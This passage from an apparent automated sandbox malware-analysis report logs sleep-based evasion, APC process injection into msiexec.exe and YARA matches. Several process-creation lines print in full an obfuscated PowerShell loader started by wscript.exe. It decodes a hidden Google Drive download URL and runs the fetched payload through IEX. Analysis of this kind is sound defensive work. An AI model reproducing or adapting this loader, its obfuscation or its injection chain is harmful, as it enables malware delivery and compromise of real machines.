              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5952Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3866Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8060Thread sleep time: -6456360425798339s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6080Thread sleep time: -3689348814741908s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836Thread sleep time: -26747778906878833s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 760Thread sleep count: 3386 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836Thread sleep time: -599890s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836Thread sleep time: -599781s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836Thread sleep time: -599669s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 760Thread sleep count: 6463 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836Thread sleep time: -599562s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836Thread sleep time: -599453s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836Thread sleep time: -599343s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836Thread sleep time: -599228s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836Thread sleep time: -599125s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836Thread sleep time: -599015s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836Thread sleep time: -598906s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836Thread sleep time: -598794s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836Thread sleep time: -598687s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836Thread sleep time: -598578s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836Thread sleep time: -598468s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836Thread sleep time: -598357s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836Thread sleep time: -598248s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836Thread sleep time: -598140s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836Thread sleep time: -598031s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836Thread sleep time: -597921s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836Thread sleep time: -597812s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836Thread sleep time: -597700s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836Thread sleep time: -597593s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836Thread sleep time: -597484s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836Thread sleep time: -597374s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836Thread sleep time: -597265s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836Thread sleep time: -597156s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836Thread sleep time: -597046s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836Thread sleep time: -596937s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836Thread sleep time: -596828s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836Thread sleep time: -596718s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836Thread sleep time: -596608s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836Thread sleep time: -596500s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836Thread sleep time: -596384s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836Thread sleep time: -596281s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836Thread sleep time: -596171s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836Thread sleep time: -596062s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836Thread sleep time: -595941s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836Thread sleep time: -595828s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836Thread sleep time: -595718s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836Thread sleep time: -595606s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836Thread sleep time: -595499s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836Thread sleep time: -595390s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836Thread sleep time: -595253s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836Thread sleep time: -595132s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836Thread sleep time: -595031s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836Thread sleep time: -594917s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836Thread sleep time: -594812s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836Thread sleep time: -594703s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836Thread sleep time: -594593s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599890Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599781Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599669Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599562Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599453Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599343Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599228Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599125Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599015Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598906Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598794Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598687Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598578Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598468Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598357Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598248Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598140Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598031Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597921Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597812Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597700Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597593Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597484Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597374Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597265Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597156Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597046Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596937Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596828Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596718Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596608Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596500Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596384Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596281Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596171Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596062Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595941Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595828Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595718Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595606Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595499Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595390Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595253Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595132Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595031Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594917Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594812Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594703Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594593Jump to behavior
              Source: powershell.exe, 00000002.00000002.1532140806.0000028F6D030000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_029E8870 LdrInitializeThunk,5_2_029E8870

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Source: Yara matchFile source: amsi64_7924.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7924, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1516, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 4260000Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Ilks Kapelmester Macrographic Irena Miseres Appendices Larcenic #>;$Hogward194='Halskdens';<#Tvtningernes Sporendes Cortin #>;$Nonputting=$Reorchestrate+$host.UI; function Roosting($Uncrystalled){If ($Nonputting) {$Generiske++;}$Getid=$Kommunikationsformen+$Uncrystalled.'Length'-$Generiske; for( $Pseudoemotional=5;$Pseudoemotional -lt $Getid;$Pseudoemotional+=6){$Mandaars=$Pseudoemotional;$Ulempevilkaarene122+=$Uncrystalled[$Pseudoemotional];$klynkene='Xanthipperne';}$Ulempevilkaarene122;}function Outsprint($Pseudoemotionalncestuous8){ . ($Nonsubtility) ($Pseudoemotionalncestuous8);}$Lame=Roosting ' fresMSig loSel gzPododiVoltalKnaldlPladsaSenne/Astas ';$Lame+=Roosting 'Taarn5Gauge. Crab0Brneh Inob(Raps WKomediCulvenHumpldSkippo NonrwLaur sTakst Dks lNQuay TApost Haand1Sec n0 ,ykm.Bri,a0Vejbr;hackw TrykfWreskoi,outrn Pria6Non o4H pot;Pt,ry therox Darl6Re ar4 tu,i; redi Pejlir istyvTypis:Omste1Maall3Uhlan1 Flu..Subsi0,arde)S lvc ApofeGEksore SamtcGrundkWinecoRet r/O tje2Requ 0S,rap1 Phen0.llel0Wa li1Lacca0Udsag1skyt, DobbeFBr ndiVandsrtamtaeForegfProteoSjuskxGlass/Lgkno1Dives3Hildi1emalj.Taile0O phy ';$Skibsprovianteringens=Roosting ' StatU UltrsUdsuge FinaR Akro-AlkohAAcolygAsylbeIreniNheftetsec,r ';$Discanonize=Roosting 'sulemh RetstPladetHyperpBrow,sBlufr:Atrsg/Dimet/ Syn,dBistrr ElgtiTvedevDreneeElorg.Smughg Spo oWeb uoOoriagStormlColleeUpbra. OmorcN namoMfikkmIm er/camemu remicOperc?UdkmpeDyne xN.nrap oceloTra,srWreattR.esu= udedDagbaoIndsnwRomannFodbolAelu oRecuraNgtfldLe le&Sy taiFremkdUnsac= .rig1 Hastq oppo2KerneSVari NB ysk6DashedAblew6Flekss nforfPopulcAnthrOMon iENitr,eKa.enx,reenGTrope1Se ar9.lankWBjelia EuphNSams,LD finkMis twBiddeATele,tProdutCorke4 ejldXRa et_AntirkGruttCAdelsyOphth ';$Elysisk57=Roosting 'Ou ha>Se is ';$Nonsubtility=Roosting 'LibysiFo ruETactaXHisto ';$Uncapitalizeds='Budcentralens';$Markedsundersgelser='\Bindehindens.Stu';Outsprint (Roosting 'Tu ul$I stigAfrohllsgngOFavo,BSuperaP otelOma d: .yvebSlibeA WhisgantihM TolvAulivsN edviDSmaareDispaN.nderSoxyty= Sted$KolleEApo eNSandpv Rdli:VidovAPallep KellpChartdHotheAadde tphalaaOphol+Beaum$Ov remDecimA S emrQuattKFrokoEUncopDNonbis FimsUSoljeNFantadPu keePatteRSklmeS red,GSy deeSkabeLLrebrSBecl,ePr darKnop ');Outsprint (Roosting ' p nd$eutonGUro ll Cit OHypodb RegnAAkkusL aski: rissaRvegrcActsbhB mboEselvinBouldILisseAInsurLDroll=Chefp$haem D oloIValyls S idcSpindA rounNSandbO Radin BrodI heckz Fjere,katt.resatSR,ppoPTel,ml C ssi Eus tAddee(mor o$OverseDrevnlReh.bYAetiosKonf,Iw lpaSSubstKEksam5Minis7Sig a)Kulde ');Outsprint (Roosting 'frem [KitefnTudedESki,et nonf.K.abtSFrarveNeurorAltsaVLssalIMormyC,utofe Torsp disgoEjendiE,sasn Fr mTAfstrmFugleaA couN FlydA PortG iod eKre.trNorma]Metra:Myste: irres ByggE BlancU.komuTelefRDin,aiLok.ltJap nYYndliPTheetrDblbeOJinritSadelO,etaiCUnderOA,cuslPen i Prea= Chut Creep[MiswonOmredEAfrunT Str,.Aa,tuSUdJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#ilks kapelmester macrographic irena miseres appendices larcenic #>;$hogward194='halskdens';<#tvtningernes sporendes cortin #>;$nonputting=$reorchestrate+$host.ui; function roosting($uncrystalled){if ($nonputting) {$generiske++;}$getid=$kommunikationsformen+$uncrystalled.'length'-$generiske; for( $pseudoemotional=5;$pseudoemotional -lt $getid;$pseudoemotional+=6){$mandaars=$pseudoemotional;$ulempevilkaarene122+=$uncrystalled[$pseudoemotional];$klynkene='xanthipperne';}$ulempevilkaarene122;}function outsprint($pseudoemotionalncestuous8){ . ($nonsubtility) ($pseudoemotionalncestuous8);}$lame=roosting ' fresmsig losel gzpododivoltalknaldlpladsasenne/astas ';$lame+=roosting 'taarn5gauge. crab0brneh inob(raps wkomediculvenhumpldskippo nonrwlaur stakst dks lnquay tapost haand1sec n0 ,ykm.bri,a0vejbr;hackw trykfwreskoi,outrn pria6non o4h pot;pt,ry therox darl6re ar4 tu,i; redi pejlir istyvtypis:omste1maall3uhlan1 flu..subsi0,arde)s lvc apofegeksore samtcgrundkwinecoret r/o tje2requ 0s,rap1 phen0.llel0wa li1lacca0udsag1skyt, dobbefbr ndivandsrtamtaeforegfproteosjuskxglass/lgkno1dives3hildi1emalj.taile0o phy ';$skibsprovianteringens=roosting ' statu ultrsudsuge finar akro-alkohaacolygasylbeireninheftetsec,r ';$discanonize=roosting 'sulemh retstpladethyperpbrow,sblufr:atrsg/dimet/ syn,dbistrr elgtitvedevdreneeelorg.smughg spo oweb uoooriagstormlcolleeupbra. omorcn namomfikkmim er/camemu remicoperc?udkmpedyne xn.nrap ocelotra,srwreattr.esu= udeddagbaoindsnwromannfodbolaelu orecurangtfldle le&sy taifremkdunsac= .rig1 hastq oppo2kernesvari nb ysk6dashedablew6flekss nforfpopulcanthromon ienitr,eka.enx,reengtrope1se ar9.lankwbjelia euphnsams,ld finkmis twbiddeatele,tprodutcorke4 ejldxra et_antirkgruttcadelsyophth ';$elysisk57=roosting 'ou ha>se is ';$nonsubtility=roosting 'libysifo ruetactaxhisto ';$uncapitalizeds='budcentralens';$markedsundersgelser='\bindehindens.stu';outsprint (roosting 'tu ul$i stigafrohllsgngofavo,bsuperap oteloma d: .yvebslibea whisgantihm tolvaulivsn edvidsmaaredispan.ndersoxyty= sted$kolleeapo ensandpv rdli:vidovapallep kellpchartdhotheaadde tphalaaophol+beaum$ov remdecima s emrquattkfrokoeuncopdnonbis fimsusoljenfantadpu keepattersklmes red,gsy deeskabellrebrsbecl,epr darknop ');outsprint (roosting ' p nd$eutonguro ll cit ohypodb regnaakkusl aski: rissarvegrcactsbhb mboeselvinbouldilisseainsurldroll=chefp$haem d oloivalyls s idcspinda rounnsandbo radin brodi heckz fjere,katt.resatsr,ppoptel,ml c ssi eus taddee(mor o$oversedrevnlreh.byaetioskonf,iw lpassubstkeksam5minis7sig a)kulde ');outsprint (roosting 'frem [kitefntudedeski,et nonf.k.abtsfrarveneuroraltsavlssalimormyc,utofe torsp disgoejendie,sasn fr mtafstrmfugleaa coun flyda portg iod ekre.trnorma]metra:myste: irres bygge blancu.komutelefrdin,ailok.ltjap nyyndliptheetrdblbeojinritsadelo,etaicunderoa,cuslpen i prea= chut creep[miswonomredeafrunt str,.aa,tusud
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" " <#ilks kapelmester macrographic irena miseres appendices larcenic #>;$hogward194='halskdens';<#tvtningernes sporendes cortin #>;$nonputting=$reorchestrate+$host.ui; function roosting($uncrystalled){if ($nonputting) {$generiske++;}$getid=$kommunikationsformen+$uncrystalled.'length'-$generiske; for( $pseudoemotional=5;$pseudoemotional -lt $getid;$pseudoemotional+=6){$mandaars=$pseudoemotional;$ulempevilkaarene122+=$uncrystalled[$pseudoemotional];$klynkene='xanthipperne';}$ulempevilkaarene122;}function outsprint($pseudoemotionalncestuous8){ . ($nonsubtility) ($pseudoemotionalncestuous8);}$lame=roosting ' fresmsig losel gzpododivoltalknaldlpladsasenne/astas ';$lame+=roosting 'taarn5gauge. crab0brneh inob(raps wkomediculvenhumpldskippo nonrwlaur stakst dks lnquay tapost haand1sec n0 ,ykm.bri,a0vejbr;hackw trykfwreskoi,outrn pria6non o4h pot;pt,ry therox darl6re ar4 tu,i; redi pejlir istyvtypis:omste1maall3uhlan1 flu..subsi0,arde)s lvc apofegeksore samtcgrundkwinecoret r/o tje2requ 0s,rap1 phen0.llel0wa li1lacca0udsag1skyt, dobbefbr ndivandsrtamtaeforegfproteosjuskxglass/lgkno1dives3hildi1emalj.taile0o phy ';$skibsprovianteringens=roosting ' statu ultrsudsuge finar akro-alkohaacolygasylbeireninheftetsec,r ';$discanonize=roosting 'sulemh retstpladethyperpbrow,sblufr:atrsg/dimet/ syn,dbistrr elgtitvedevdreneeelorg.smughg spo oweb uoooriagstormlcolleeupbra. omorcn namomfikkmim er/camemu remicoperc?udkmpedyne xn.nrap ocelotra,srwreattr.esu= udeddagbaoindsnwromannfodbolaelu orecurangtfldle le&sy taifremkdunsac= .rig1 hastq oppo2kernesvari nb ysk6dashedablew6flekss nforfpopulcanthromon ienitr,eka.enx,reengtrope1se ar9.lankwbjelia euphnsams,ld finkmis twbiddeatele,tprodutcorke4 ejldxra et_antirkgruttcadelsyophth ';$elysisk57=roosting 'ou ha>se is ';$nonsubtility=roosting 'libysifo ruetactaxhisto ';$uncapitalizeds='budcentralens';$markedsundersgelser='\bindehindens.stu';outsprint (roosting 'tu ul$i stigafrohllsgngofavo,bsuperap oteloma d: .yvebslibea whisgantihm tolvaulivsn edvidsmaaredispan.ndersoxyty= sted$kolleeapo ensandpv rdli:vidovapallep kellpchartdhotheaadde tphalaaophol+beaum$ov remdecima s emrquattkfrokoeuncopdnonbis fimsusoljenfantadpu keepattersklmes red,gsy deeskabellrebrsbecl,epr darknop ');outsprint (roosting ' p nd$eutonguro ll cit ohypodb regnaakkusl aski: rissarvegrcactsbhb mboeselvinbouldilisseainsurldroll=chefp$haem d oloivalyls s idcspinda rounnsandbo radin brodi heckz fjere,katt.resatsr,ppoptel,ml c ssi eus taddee(mor o$oversedrevnlreh.byaetioskonf,iw lpassubstkeksam5minis7sig a)kulde ');outsprint (roosting 'frem [kitefntudedeski,et nonf.k.abtsfrarveneuroraltsavlssalimormyc,utofe torsp disgoejendie,sasn fr mtafstrmfugleaa coun flyda portg iod ekre.trnorma]metra:myste: irres bygge blancu.komutelefrdin,ailok.ltjap nyyndliptheetrdblbeojinritsadelo,etaicunderoa,cuslpen i prea= chut creep[miswonomredeafrunt str,.aa,tusud
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#ilks kapelmester macrographic irena miseres appendices larcenic #>;$hogward194='halskdens';<#tvtningernes sporendes cortin #>;$nonputting=$reorchestrate+$host.ui; function roosting($uncrystalled){if ($nonputting) {$generiske++;}$getid=$kommunikationsformen+$uncrystalled.'length'-$generiske; for( $pseudoemotional=5;$pseudoemotional -lt $getid;$pseudoemotional+=6){$mandaars=$pseudoemotional;$ulempevilkaarene122+=$uncrystalled[$pseudoemotional];$klynkene='xanthipperne';}$ulempevilkaarene122;}function outsprint($pseudoemotionalncestuous8){ . ($nonsubtility) ($pseudoemotionalncestuous8);}$lame=roosting ' fresmsig losel gzpododivoltalknaldlpladsasenne/astas ';$lame+=roosting 'taarn5gauge. crab0brneh inob(raps wkomediculvenhumpldskippo nonrwlaur stakst dks lnquay tapost haand1sec n0 ,ykm.bri,a0vejbr;hackw trykfwreskoi,outrn pria6non o4h pot;pt,ry therox darl6re ar4 tu,i; redi pejlir istyvtypis:omste1maall3uhlan1 flu..subsi0,arde)s lvc apofegeksore samtcgrundkwinecoret r/o tje2requ 0s,rap1 phen0.llel0wa li1lacca0udsag1skyt, dobbefbr ndivandsrtamtaeforegfproteosjuskxglass/lgkno1dives3hildi1emalj.taile0o phy ';$skibsprovianteringens=roosting ' statu ultrsudsuge finar akro-alkohaacolygasylbeireninheftetsec,r ';$discanonize=roosting 'sulemh retstpladethyperpbrow,sblufr:atrsg/dimet/ syn,dbistrr elgtitvedevdreneeelorg.smughg spo oweb uoooriagstormlcolleeupbra. omorcn namomfikkmim er/camemu remicoperc?udkmpedyne xn.nrap ocelotra,srwreattr.esu= udeddagbaoindsnwromannfodbolaelu orecurangtfldle le&sy taifremkdunsac= .rig1 hastq oppo2kernesvari nb ysk6dashedablew6flekss nforfpopulcanthromon ienitr,eka.enx,reengtrope1se ar9.lankwbjelia euphnsams,ld finkmis twbiddeatele,tprodutcorke4 ejldxra et_antirkgruttcadelsyophth ';$elysisk57=roosting 'ou ha>se is ';$nonsubtility=roosting 'libysifo ruetactaxhisto ';$uncapitalizeds='budcentralens';$markedsundersgelser='\bindehindens.stu';outsprint (roosting 'tu ul$i stigafrohllsgngofavo,bsuperap oteloma d: .yvebslibea whisgantihm tolvaulivsn edvidsmaaredispan.ndersoxyty= sted$kolleeapo ensandpv rdli:vidovapallep kellpchartdhotheaadde tphalaaophol+beaum$ov remdecima s emrquattkfrokoeuncopdnonbis fimsusoljenfantadpu keepattersklmes red,gsy deeskabellrebrsbecl,epr darknop ');outsprint (roosting ' p nd$eutonguro ll cit ohypodb regnaakkusl aski: rissarvegrcactsbhb mboeselvinbouldilisseainsurldroll=chefp$haem d oloivalyls s idcspinda rounnsandbo radin brodi heckz fjere,katt.resatsr,ppoptel,ml c ssi eus taddee(mor o$oversedrevnlreh.byaetioskonf,iw lpassubstkeksam5minis7sig a)kulde ');outsprint (roosting 'frem [kitefntudedeski,et nonf.k.abtsfrarveneuroraltsavlssalimormyc,utofe torsp disgoejendie,sasn fr mtafstrmfugleaa coun flyda portg iod ekre.trnorma]metra:myste: irres bygge blancu.komutelefrdin,ailok.ltjap nyyndliptheetrdblbeojinritsadelo,etaicunderoa,cuslpen i prea= chut creep[miswonomredeafrunt str,.aa,tusudJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
